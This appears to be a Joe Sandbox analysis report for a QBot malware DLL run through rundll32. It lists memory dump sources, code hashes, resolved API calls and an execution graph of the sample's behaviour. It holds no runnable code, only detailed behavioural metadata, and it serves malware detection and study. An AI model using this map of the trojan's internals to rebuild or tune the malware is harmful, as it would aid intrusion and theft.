                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: QueryVirtual$memcpy
                                                                                                                                                                                                                                                                            • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                                                                                                                                                            • API String ID: 2264504374-157664173
                                                                                                                                                                                                                                                                            • Opcode ID: 24111475d2224d49a3310be673771e99438ce2be4a556ea7fae8b5e7b6f244b6
                                                                                                                                                                                                                                                                            • Instruction ID: d2aee75258144a234741a529dde6d5742a97a54de560bdcf7392abec5c5a9d56
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24111475d2224d49a3310be673771e99438ce2be4a556ea7fae8b5e7b6f244b6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9331FBB15053019FD710DF19E58460ABBF9AF85748F86886DE889CB311F730D984CB93
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • linit_memory_mgr.042_QBOT.DLL ref: 6AD94FEB
                                                                                                                                                                                                                                                                            • linit_marker_reader.042_QBOT.DLL ref: 6AD95083
                                                                                                                                                                                                                                                                            • linit_input_controller.042_QBOT.DLL ref: 6AD9508B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: linit_input_controller.042_linit_marker_reader.042_linit_memory_mgr.042_
                                                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                                                            • API String ID: 1812129641-2852464175
                                                                                                                                                                                                                                                                            • Opcode ID: e25c2bec6530310f2659e09cd0d69c14425e1d784dba9eb933eba84cabbe6607
                                                                                                                                                                                                                                                                            • Instruction ID: df7413b6ea11ebe831d52a07390beabf7ab4cec8b17e4933af665bc9dc0eef73
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e25c2bec6530310f2659e09cd0d69c14425e1d784dba9eb933eba84cabbe6607
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D5127B1504341CFEB409F24C49A7477FA2EF45308F5A85A8DC494F39AC7BAC449CBA2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: fd3e345aa76fe7250c9036806b672ebe074b997cb9e74fd6c3123059f4960f31
                                                                                                                                                                                                                                                                            • Instruction ID: 5c82de6ab288bc658a6ef02309b5ebd056ff84ab922924b4ce3d6def8c7b3fb9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd3e345aa76fe7250c9036806b672ebe074b997cb9e74fd6c3123059f4960f31
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22D16975A48241DFD718CF28C055B627BF2BF8A300F4784A9D8898F3A2DB74E941CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL ref: 6AD95C66
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL ref: 6AD95CA0
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL(?), ref: 6AD95CEC
                                                                                                                                                                                                                                                                            • linit_upsampler.042_QBOT.DLL ref: 6AD95D10
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ldiv_round_up.042_$linit_upsampler.042_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3259470508-0
                                                                                                                                                                                                                                                                            • Opcode ID: da5f2f2cfea2b43639568c02a8941e52612899b1af8d8b2027a139d06db0dbe5
                                                                                                                                                                                                                                                                            • Instruction ID: 80434f9f3f5ae4dd28d118be5abef8e07339e7408c6cf9c5450425bc7d23256c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da5f2f2cfea2b43639568c02a8941e52612899b1af8d8b2027a139d06db0dbe5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03513774609701DFDB58DF28C1C4A5ABBE1FF89704F1688ADE9898B315DB30E845CB52
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __dllonexit_lock_onexit_unlock
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 209411981-0
                                                                                                                                                                                                                                                                            • Opcode ID: 60430c18888137938619c58bf4cf444f392e00b3fe098dbbed665fd4bea5b62c
                                                                                                                                                                                                                                                                            • Instruction ID: 983c72dcd00ff6fc5be3ffad00703c7a34335f25066d8c37b53ed1931195674b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60430c18888137938619c58bf4cf444f392e00b3fe098dbbed665fd4bea5b62c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B211A4F49093008FDB40EFB9D58851EBBF4BB59214F43596DE8C5C7351EB3495848BA2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lpeg_write_tables.042_QBOT.DLL ref: 6AD8238C
                                                                                                                                                                                                                                                                              • Part of subcall function 6ADADEB0: memset.MSVCRT ref: 6ADADECA
                                                                                                                                                                                                                                                                            • lpeg_write_tables.042_QBOT.DLL ref: 6AD8246F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lpeg_write_tables.042_$memset
                                                                                                                                                                                                                                                                            • String ID: T
                                                                                                                                                                                                                                                                            • API String ID: 2574012396-3187964512
                                                                                                                                                                                                                                                                            • Opcode ID: 16579e418b7114580a242a58749bf80d80c295ca353e253c30fca1e3a5a70d42
                                                                                                                                                                                                                                                                            • Instruction ID: 4fdc3ac01e3d65ca0392028ace5de360d9fe5c146245f42c22aeaaf228dc7a27
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16579e418b7114580a242a58749bf80d80c295ca353e253c30fca1e3a5a70d42
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7781B2B56097419FC354CF29C584A0AFBF1BF88768F468A6EF99997310DB30E941CB42
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lround_up.042_
                                                                                                                                                                                                                                                                            • String ID: x
                                                                                                                                                                                                                                                                            • API String ID: 876701716-2363233923
                                                                                                                                                                                                                                                                            • Opcode ID: 5e94dd32af8b4527e4628fc4a1b9cd76541ce9f8ce4fd41565f4bd195313e53a
                                                                                                                                                                                                                                                                            • Instruction ID: 29a580eb566f46f941f2f6de73a124049dd45205d8d3f5828e3b15dd7f315306
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e94dd32af8b4527e4628fc4a1b9cd76541ce9f8ce4fd41565f4bd195313e53a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 125191B45053009FD740DF19C184A9ABBE1BF88708F16C9AEE88D8B316D776E946CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lround_up.042_
                                                                                                                                                                                                                                                                            • String ID: h
                                                                                                                                                                                                                                                                            • API String ID: 876701716-2439710439
                                                                                                                                                                                                                                                                            • Opcode ID: f0bac1e6647a227ab9b6bef3a51b905cbed0bd53569b212af88ee7eb17eeadaa
                                                                                                                                                                                                                                                                            • Instruction ID: 1fba1324890fa87e8d68035a9d94754a5a3668e32579de7705a16ff4a65a52c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0bac1e6647a227ab9b6bef3a51b905cbed0bd53569b212af88ee7eb17eeadaa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5641C5B99057009FC350CF15C184A9AFBF0FF88714F068AAEE8998B711D775A955CF82
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • __deregister_frame_info, xrefs: 6AD81575
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                            • String ID: __deregister_frame_info
                                                                                                                                                                                                                                                                            • API String ID: 3013587201-1515262489
                                                                                                                                                                                                                                                                            • Opcode ID: 98d4011d7fc9e54ddd4b5fa66f294f1959cac8d665bc0da1b81202120f2b0d71
                                                                                                                                                                                                                                                                            • Instruction ID: 782b1e555356ceae5262b15ddc5d94d78428f7c5180b692fe35614374b348a05
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98d4011d7fc9e54ddd4b5fa66f294f1959cac8d665bc0da1b81202120f2b0d71
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5E0C7B1504600DBEB007F79A5463277BF47B41205F42455CE462D7244EA34E809D7D3
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:6.6%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                            Signature Coverage:5.6%
                                                                                                                                                                                                                                                                            Total number of Nodes:1461
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:8
                                                                                                                                                                                                                                                                            execution_graph 11647 10001000 11650 10001494 11647->11650 11674 100015d4 11650->11674 11654 100014a4 11698 10009203 11654->11698 11658 10001005 ExitProcess 11659 100014c9 11659->11658 11660 100014fa CoInitializeEx 11659->11660 11661 10001569 11659->11661 11773 100099ec 11660->11773 11663 10001597 11661->11663 11751 1000a771 11661->11751 11663->11658 11666 100015c5 11663->11666 11786 100029dd 11663->11786 11666->11658 11796 100012f8 11666->11796 11670 10001525 11671 10001560 11670->11671 11672 10001553 Sleep 11670->11672 11782 10009e2e 11671->11782 11672->11670 11824 10009559 11674->11824 11677 10009559 8 API calls 11678 10001601 11677->11678 11679 10009559 8 API calls 11678->11679 11680 1000161a 11679->11680 11681 10009559 8 API calls 11680->11681 11682 10001633 11681->11682 11683 10009559 8 API calls 11682->11683 11684 1000164c 11683->11684 11685 10009559 8 API calls 11684->11685 11686 10001667 11685->11686 11687 10009559 8 API calls 11686->11687 11688 10001680 11687->11688 11689 10009559 8 API calls 11688->11689 11690 10001699 11689->11690 11691 10009559 8 API calls 11690->11691 11692 100016b2 11691->11692 11693 10009559 8 API calls 11692->11693 11694 1000149d 11693->11694 11695 100091e7 11694->11695 11696 100091f3 11695->11696 11697 100091f5 RtlAllocateHeap 11695->11697 11696->11654 11697->11654 11699 100014c3 11698->11699 11701 1000920d 11698->11701 11703 1000bc31 11699->11703 11701->11699 11858 1000936a 11701->11858 11704 100091e7 RtlAllocateHeap 11703->11704 11705 1000bc4c 11704->11705 11706 1000bc57 GetCurrentProcessId 11705->11706 11750 1000bfcf 11705->11750 11707 1000bc6f 11706->11707 11861 1000dd17 11707->11861 11709 1000bcd3 11877 1000e68a 11709->11877 11710 1000bcc2 11710->11709 11868 1000dd67 11710->11868 11715 1000bd08 11716 1000bd52 GetLastError 11715->11716 11717 1000bd58 11715->11717 11716->11717 11718 1000bd81 11717->11718 11719 1000bd8a 11717->11719 11952 1000bc04 11718->11952 11886 1000bb3a 11719->11886 11723 1000bd88 11890 1000d214 11723->11890 11728 1000bddd 11907 1000d22a 11728->11907 11733 1000936a memset 11734 1000be34 GetVersionExA 11733->11734 11926 1000b93e 11734->11926 11738 1000be52 GetWindowsDirectoryW 11932 100091b2 11738->11932 11741 10009e2e 2 API calls 11742 1000beaf 11741->11742 11744 1000bee7 11742->11744 11956 1000c172 11742->11956 11935 10014ae0 11744->11935 11750->11659 11753 1000a78f 11751->11753 11752 1000a7b2 lstrlenW 12055 1000a650 11752->12055 11753->11752 11756 1000a802 12063 1000a41e 11756->12063 11758 1000a7cd 11758->11758 11760 1000a7f1 lstrlenW 11758->11760 11759 1000a8e7 12103 1000a455 11759->12103 11762 1000a90c 11760->11762 11762->11663 11763 1000a8ec 11764 1000a902 11763->11764 11767 10009203 2 API calls 11763->11767 11765 10009203 2 API calls 11764->11765 11765->11762 11766 1000936a memset 11771 1000a807 11766->11771 11767->11763 11771->11759 11771->11766 12068 1000cb78 11771->12068 12073 1000a93e 11771->12073 12082 1000aa38 11771->12082 12089 1000e23e 11771->12089 11774 100099fe 11773->11774 11775 100091e7 RtlAllocateHeap 11774->11775 11776 10009a1d 11775->11776 11777 1000151c 11776->11777 11778 10009a29 lstrcatW 11776->11778 11779 100016ec 11777->11779 11778->11776 11780 10009d63 2 API calls 11779->11780 11781 10001707 11780->11781 11781->11670 11783 10009e44 11782->11783 11784 10009e3c 11782->11784 11783->11661 11785 10009203 2 API calls 11784->11785 11785->11783 11787 100091e7 RtlAllocateHeap 11786->11787 11788 100029e4 11787->11788 11789 10002a3f 11788->11789 11790 100091e7 RtlAllocateHeap 11788->11790 11789->11666 11791 100029f5 11790->11791 11791->11789 11792 100096f3 2 API calls 11791->11792 11793 10002a1b 11792->11793 11794 10002a43 11793->11794 11795 10002a39 GetLastError 11793->11795 11794->11666 11795->11789 11797 10009192 2 API calls 11796->11797 11798 10001308 SetCurrentDirectoryA 11797->11798 11799 10009e14 2 API calls 11798->11799 11800 1000131c 11799->11800 12184 1000aae0 11800->12184 11803 10001326 11803->11658 11805 10001330 12204 10002748 11805->12204 11810 10001393 12239 10001192 11810->12239 11811 10001344 11813 10001349 11811->11813 11814 10001398 11811->11814 11816 100013b4 11813->11816 11819 1000c08f 7 API calls 11813->11819 11815 10001391 11814->11815 11814->11816 12264 1001143c 11814->12264 12285 10001178 11815->12285 11816->11658 11820 10001369 11819->11820 12216 10002382 11820->12216 11834 10009192 11824->11834 11827 10009584 LoadLibraryA 11829 1000958b 11827->11829 11828 1000957c GetModuleHandleA 11828->11829 11833 10009599 11829->11833 11837 1000950e 11829->11837 11842 10009e14 11833->11842 11846 10009cbf 11834->11846 11836 100091ad 11836->11827 11836->11828 11838 100091e7 RtlAllocateHeap 11837->11838 11839 10009520 11838->11839 11840 1000954f 11839->11840 11852 100093b8 11839->11852 11840->11833 11843 10009e22 11842->11843 11844 100015e8 11842->11844 11845 10009203 2 API calls 11843->11845 11844->11677 11845->11844 11847 10009cd4 11846->11847 11848 10009ce9 GetNumberFormatA 11846->11848 11847->11848 11850 10009d17 11847->11850 11849 10009d0b 11848->11849 11849->11836 11849->11849 11851 100091e7 RtlAllocateHeap 11850->11851 11851->11849 11853 1000942c 11852->11853 11854 100093d1 11852->11854 11853->11839 11854->11853 11855 10009484 LoadLibraryA 11854->11855 11855->11853 11856 10009492 GetProcAddress 11855->11856 11856->11853 11857 1000949e 11856->11857 11857->11853 11859 10009373 memset 11858->11859 11860 1000923d HeapFree 11858->11860 11859->11860 11860->11699 11862 1000dd2e 11861->11862 11863 1000dd32 11862->11863 11960 1000dd00 11862->11960 11863->11710 11866 1000dd43 11866->11710 11867 1000dd57 FindCloseChangeNotification 11867->11866 11972 1000dc3c GetCurrentThread OpenThreadToken 11868->11972 11871 1000de1d 11871->11709 11872 1000dc93 6 API calls 11876 1000dd9b FindCloseChangeNotification 11872->11876 11874 1000de13 11875 10009203 2 API calls 11874->11875 11875->11871 11876->11871 11876->11874 11879 1000e6a9 11877->11879 11878 1000bcfd 11881 1000e64f 11878->11881 11879->11878 11977 1000984f 11879->11977 11882 1000e666 11881->11882 11883 1000e686 11882->11883 11884 1000984f RtlAllocateHeap 11882->11884 11883->11715 11885 1000e673 11884->11885 11885->11715 11887 1000bb4f 11886->11887 11888 1000bb60 11887->11888 